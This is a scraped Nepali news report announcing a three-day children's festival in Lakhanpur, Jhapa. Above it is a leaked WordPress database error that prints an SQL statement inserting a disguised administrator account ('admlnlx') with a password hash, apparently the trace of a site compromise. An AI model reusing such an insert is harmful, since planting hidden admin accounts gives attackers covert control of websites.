WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3.qNPusyGUjsQRoJgeufIHaVxkgWg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 13:03:41', '', 'admlnlx', 'admlnlx')
दमक,माघ ३-
झापाको लखनपुरमा तीन दिने बाल महोत्सव हुने भएको छ ।
बालबालिकाको क्षमता, विकासँगै उनीहरुको अधिकार संरक्षण गर्ने उद्देश्यले स्थानीय उज्यालो बाल क्लबको आयोजनामा यही माघ १४ गतेदेखि १६ गतेसम्म प्रथम बाल महोत्सव हुने भएको हो ।
स्थानीय आदिवासी रङ्गशालामा हुने महोत्सव देशकै पहिलो बाल महोत्सव हुने आयोजकको दाबी छ ।
बाल महोत्सवमा बाल फोटो प्रदर्शनी, स्वास्थ्य शिविर, बाल उद्यान तथा मनोरञ्जनात्मक खेल प्रदर्शनी, जादु, कला, विज्ञान प्रविधि सम्बन्धी प्रदर्शनीलगायतका स्टल रहने महोत्सव मूलआयोजक समितिका संयोजक सन्तोष भण्डारीले जानकारी दिनुभयो ।
महोत्सवमा विद्यार्थी, अभिभावक, बाल समूह, कलेजका विद्यार्थी सहभागी हुने छन् । महोत्सवका लागि १२ वटा उपसमिति बनाएर तयारी भइरहेको जनाइएको छ ।- रासस